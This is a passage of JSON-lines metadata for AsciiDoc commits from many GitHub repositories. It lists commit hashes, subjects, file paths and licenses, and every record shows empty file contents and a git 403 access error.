badge\n","repos":"GYMY-16\/gymybook,GYMY-16\/gymybook","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GYMY-16\/gymybook.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3481331c1f25b5c018ded41da4ebec2a3b66a885","subject":"Added README.adoc.","message":"Added README.adoc.\n","repos":"ToToTec\/CmdOption,ToToTec\/CmdOption","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ToToTec\/CmdOption.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e26216b3984d433cfae3cdfaab143c792255e95c","subject":"a final => the final","message":"a final => the final\n","repos":"droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,oskopek\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"download\/releaseNotes\/releaseNotes6.3.adoc","new_file":"download\/releaseNotes\/releaseNotes6.3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8c8cd99bdf92b8afb9298822dde35da2e362e195","subject":"Introduces conditional rendering in README","message":"Introduces conditional rendering in README","repos":"arquillian\/arquillian-core,MatousJobanek\/arquillian-core,rhusar\/arquillian-core,rhusar\/arquillian-core,MatousJobanek\/arquillian-core,bartoszmajsak\/arquillian-core,bartoszmajsak\/arquillian-core","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bartoszmajsak\/arquillian-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e78145b0cc23799f4bc08bd52fe38fbcfc60b354","subject":"add readme","message":"add readme\n","repos":"kyonmm\/startup-spock","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kyonmm\/startup-spock.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"38b6778b69c29b9e57a68ff729865e9fbd565a39","subject":"Publish 2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","message":"Publish 2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_file":"2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"05441657999b2175135b2aed672b101fb69adbcd","subject":"Add first iteration of the protean message","message":"Add first iteration of the protean message\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/What is Protean.asciidoc","new_file":"docs\/src\/main\/asciidoc\/What is Protean.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9683f1d0d56dc03ce58f372f29219a51ae42b220","subject":"Update 2015-01-31-My-English-Title.adoc","message":"Update 2015-01-31-My-English-Title.adoc","repos":"lawrencetaylor\/hubpress.io,lawrencetaylor\/hubpress.io,lawrencetaylor\/hubpress.io,lawrencetaylor\/hubpress.io","old_file":"_posts\/2015-01-31-My-English-Title.adoc","new_file":"_posts\/2015-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lawrencetaylor\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"deb4f06ce4c9dab9834a63fc7b63bcd0e813cb6a","subject":"Update 2016-01-23-Giving-up-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65d9d386a7dcf709e03e188d3505ce576a425de7","subject":"Update 2017-04-21-MVC-MVP-and-MVVM.adoc","message":"Update 2017-04-21-MVC-MVP-and-MVVM.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2017-04-21-MVC-MVP-and-MVVM.adoc","new_file":"_posts\/2017-04-21-MVC-MVP-and-MVVM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa32bfedd81e6827ac96f5df97f3251cd9d5cd56","subject":"Update 2019-01-31-My-English-Title.adoc","message":"Update 2019-01-31-My-English-Title.adoc","repos":"14FRS851\/14FRS851.github.io","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/14FRS851\/14FRS851.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"403aa9a07e37ed82c88a91238e101a8ff1a6ca41","subject":"Added Readme to LED Mesh example","message":"Added Readme to LED Mesh example\n","repos":"mrquincle\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh,ihassin\/nRF51-ble-bcast-mesh,ihassin\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh","old_file":"examples\/LED_mesh\/README.adoc","new_file":"examples\/LED_mesh\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mrquincle\/nRF51-ble-bcast-mesh.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"16a60a21faaaf3f40b2842767699318347d8ce54","subject":"Update 2016-03-29-Ingenieria-social-S-E.adoc","message":"Update 2016-03-29-Ingenieria-social-S-E.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Ingenieria-social-S-E.adoc","new_file":"_posts\/2016-03-29-Ingenieria-social-S-E.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b711a799243e057e01884c7e4ad0e45d1f093bba","subject":"Update 2016-10-05-Etat-de-lart-createur.adoc","message":"Update 2016-10-05-Etat-de-lart-createur.adoc","repos":"3991\/3991.github.io,3991\/3991.github.io,3991\/3991.github.io,3991\/3991.github.io","old_file":"_posts\/2016-10-05-Etat-de-lart-createur.adoc","new_file":"_posts\/2016-10-05-Etat-de-lart-createur.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/3991\/3991.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b5de5551094b348c1d5087fa5140cb75f15d317e","subject":"Update 2016-11-11-092000-Friday-Morning.adoc","message":"Update 2016-11-11-092000-Friday-Morning.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-11-092000-Friday-Morning.adoc","new_file":"_posts\/2016-11-11-092000-Friday-Morning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c1364229148ebea58bfcbdf7617343e9c8ba89f","subject":"Update 2018-02-05-Think-About-Documents.adoc","message":"Update 2018-02-05-Think-About-Documents.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-05-Think-About-Documents.adoc","new_file":"_posts\/2018-02-05-Think-About-Documents.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f141594fc0cc84e99349ee97c4266594b730d7f","subject":"adding README-es.adoc","message":"adding README-es.adoc\n","repos":"jelitox\/jelitox.github.io,jelitox\/jelitox.github.io,jelitox\/jelitox.github.io","old_file":"README-es.adoc","new_file":"README-es.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jelitox\/jelitox.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"032f1d58914ef5a85d4849cd3ff5e04b1ea2405c","subject":"Delete README-ja.adoc","message":"Delete README-ja.adoc","repos":"gsha0\/hubpress.io,gsha0\/hubpress.io,gsha0\/hubpress.io,gsha0\/hubpress.io","old_file":"README-ja.adoc","new_file":"README-ja.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gsha0\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8cf2c5e63c0a5290f81ee034fb1f21da549230a6","subject":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","message":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5a2ed3565b5e3554b07d7f5d95bc18eb64a31fd7","subject":"y2b create post World's First Projection Mouse - Does It Suck?","message":"y2b create post World's First Projection Mouse - Does It Suck?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-12-24-Worlds-First-Projection-Mouse--Does-It-Suck.adoc","new_file":"_posts\/2016-12-24-Worlds-First-Projection-Mouse--Does-It-Suck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d6b51f801ad8196e4235bdf1201cbff27e52391","subject":"Create 2014-09-08-forge-2.9.2.final.asciidoc","message":"Create 2014-09-08-forge-2.9.2.final.asciidoc","repos":"addonis1990\/docs,addonis1990\/docs,forge\/docs,forge\/docs,luiz158\/docs,agoncal\/docs,agoncal\/docs,luiz158\/docs","old_file":"news\/2014-09-08-forge-2.9.2.final.asciidoc","new_file":"news\/2014-09-08-forge-2.9.2.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"a9abde3216422bb5bebe096188cc84c77dd9609c","subject":"Update 2019-02-22-docker-selenium-with-php.adoc","message":"Update 2019-02-22-docker-selenium-with-php.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-22-docker-selenium-with-php.adoc","new_file":"_posts\/2019-02-22-docker-selenium-with-php.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fabb74ad0c27f5846628454b37188acc0d283f84","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a092a748fd2b342537c100bb31c6e88b56accc5","subject":"Wording","message":"Wording\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Maven\/Maven central.adoc","new_file":"Maven\/Maven central.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"88a8812166d7f078ca97a884ff21cffa0fd49633","subject":"Update 2017-02-07-Managing-docker-compose.adoc","message":"Update 2017-02-07-Managing-docker-compose.adoc","repos":"MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io","old_file":"_posts\/2017-02-07-Managing-docker-compose.adoc","new_file":"_posts\/2017-02-07-Managing-docker-compose.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MartinAhrer\/martinahrer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7cd0665c31d3b7afdfe94e87c600fb3116acc0f","subject":"Translate in progress (2016\/05\/24-25)","message":"Translate in progress (2016\/05\/24-25)\n","repos":"sardine\/spring-ref-ja","old_file":"src\/asciidoc\/web-mvc.adoc","new_file":"src\/asciidoc\/web-mvc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sardine\/spring-ref-ja.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f6c2443434979af3e44bafcb72767303cd3c5b25","subject":"Publish 2015-6-1-MythTV-Notes.adoc","message":"Publish 2015-6-1-MythTV-Notes.adoc","repos":"jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io","old_file":"2015-6-1-MythTV-Notes.adoc","new_file":"2015-6-1-MythTV-Notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jrhea\/jrhea.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5fda76f0507bd426ab9300feb412cd137c44dc33","subject":"Worked on documentation.","message":"Worked on documentation.\n","repos":"libyal\/esedb-kb,libyal\/esedb-kb","old_file":"documentation\/Windows Search.asciidoc","new_file":"documentation\/Windows Search.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/esedb-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"97ed15a7c5709481352911f5b5182c6431982c16","subject":"Update 2016-05-06-Welcome-Pepper.adoc","message":"Update 2016-05-06-Welcome-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-06-Welcome-Pepper.adoc","new_file":"_posts\/2016-05-06-Welcome-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75558169f14eee7e0cb8d2b3f6847472e510aa93","subject":"Flare adoc first draft","message":"Flare adoc first draft\n","repos":"ethaneldridge\/vassal,ethaneldridge\/vassal,ethaneldridge\/vassal","old_file":"vassal-doc\/src\/main\/readme-referencemanual\/ReferenceManual\/Flare.adoc","new_file":"vassal-doc\/src\/main\/readme-referencemanual\/ReferenceManual\/Flare.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ethaneldridge\/vassal.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"a4ff15a12440e9fbdbb0e4bee92422eefb7f6068","subject":"y2b create post WD My Book Studio LX Unboxing \\u0026 Overview","message":"y2b create post WD My Book Studio LX Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-02-16-WD-My-Book-Studio-LX-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-02-16-WD-My-Book-Studio-LX-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb1288d67bba60967109bed445893c8ed588e372","subject":"Update 2016-03-30-Las-matematicas-son-mis-amigas.adoc","message":"Update 2016-03-30-Las-matematicas-son-mis-amigas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Las-matematicas-son-mis-amigas.adoc","new_file":"_posts\/2016-03-30-Las-matematicas-son-mis-amigas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f0cfc92e87a5e5cc8bcf282e322dd093f199edf","subject":"Update 2019-01-15-Netlify-Nuxtjs-P-W-A.adoc","message":"Update 2019-01-15-Netlify-Nuxtjs-P-W-A.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-15-Netlify-Nuxtjs-P-W-A.adoc","new_file":"_posts\/2019-01-15-Netlify-Nuxtjs-P-W-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73929c44498bdb4908c98bab7d743e530ac65fbd","subject":"adding input values","message":"adding input values\n","repos":"markllama\/atomic-idm","old_file":"discover\/README.adoc","new_file":"discover\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markllama\/atomic-idm.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"45f2cf7e13d5df6c5c4984b5bd11867e804d1a51","subject":"y2b create post JBL Micro Wireless \\u0026 JBL Micro 2 Unboxing","message":"y2b create post JBL Micro Wireless \\u0026 JBL Micro 2 Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-12-16-JBL-Micro-Wireless-u0026-JBL-Micro-2-Unboxing.adoc","new_file":"_posts\/2012-12-16-JBL-Micro-Wireless-u0026-JBL-Micro-2-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef8482a1db35af1b68357f0e93b18fc16fe23de7","subject":"Update 2016-03-31-Los-rompe-Codigos-Parte-1.adoc","message":"Update 2016-03-31-Los-rompe-Codigos-Parte-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Los-rompe-Codigos-Parte-1.adoc","new_file":"_posts\/2016-03-31-Los-rompe-Codigos-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7222ae22eed95c21e2ff24e2c3c913faa1d4b2e1","subject":"OCTree","message":"OCTree\n","repos":"seyfullahuysal\/PCL-ROS,seyfullahuysal\/PCL-ROS,seyfullahuysal\/PCL-ROS,seyfullahuysal\/PCL-ROS,seyfullahuysal\/PCL-ROS","old_file":"OCTREE KD-TREE\/README.adoc","new_file":"OCTREE KD-TREE\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/seyfullahuysal\/PCL-ROS.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ae507ebd8c1ee0fd2eb278fdcc3e00d9e9b75e5","subject":"Add some documentation of release process","message":"Add some documentation of release process\n","repos":"Yubico\/yubico-java-client,Yubico\/yubico-java-client","old_file":"doc\/development.adoc","new_file":"doc\/development.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubico-java-client.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"1eaaee6c923b8664d629494da66d6bbfb1bb0211","subject":"Update dbm-create-changelog.adoc","message":"Update dbm-create-changelog.adoc","repos":"sbglasius\/grails-database-migration,jako512\/grails-database-migration","old_file":"src\/docs\/asciidoc\/ref\/Maintenance Scripts\/dbm-create-changelog.adoc","new_file":"src\/docs\/asciidoc\/ref\/Maintenance Scripts\/dbm-create-changelog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jako512\/grails-database-migration.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a1dbe912e0125626e7f30f8571dbb5053ba6b6d1","subject":"\ud83c\udf89 Debezium 1.1 release announcement","message":"\ud83c\udf89 Debezium 1.1 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2020-03-24-debezium-1-1-final-released.adoc","new_file":"blog\/2020-03-24-debezium-1-1-final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f4cc42a7d87f750eefef08c15a465a833e89b13c","subject":"Alerts blog entry for standalone scenario","message":"Alerts blog entry for standalone scenario\n","repos":"jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,lzoubek\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,lzoubek\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,lzoubek\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,lzoubek\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/08\/19\/hawkular-alerts-standalone.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/08\/19\/hawkular-alerts-standalone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"85290a06913ab044132891b8b4b1e66b6c36ffb9","subject":"Avoid conflict same simple name","message":"Avoid conflict same simple name\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Search path\/Exercices.adoc","new_file":"Search path\/Exercices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"99a06036beba6f4b524740c8c8e8b06af67486be","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ade1cd2c52e896c85bc335eff438e9c2382217f","subject":"Update 2016-12-22-Karma-tests-fail-cant-find-variable-Map-webpack-typescript.adoc","message":"Update 2016-12-22-Karma-tests-fail-cant-find-variable-Map-webpack-typescript.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-12-22-Karma-tests-fail-cant-find-variable-Map-webpack-typescript.adoc","new_file":"_posts\/2016-12-22-Karma-tests-fail-cant-find-variable-Map-webpack-typescript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0309733a4fa018caea5f6d0257606469ac8c81ab","subject":"Update 2015-10-01-Neu.adoc","message":"Update 2015-10-01-Neu.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2015-10-01-Neu.adoc","new_file":"_posts\/2015-10-01-Neu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59edff5e455e1cd9bd9d120b1226549d30e16b77","subject":"Update 2019-03-12-A-B.adoc","message":"Update 2019-03-12-A-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B.adoc","new_file":"_posts\/2019-03-12-A-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f3edc48a41f9cb0666d3a8f19cf8a4eea0804b2d","subject":"Update 2019-03-12-A-B.adoc","message":"Update 2019-03-12-A-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B.adoc","new_file":"_posts\/2019-03-12-A-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25e1248cce52bc7b7b04f1a45cecab3825a5dbbd","subject":"Update 2015-06-25-GIT.adoc","message":"Update 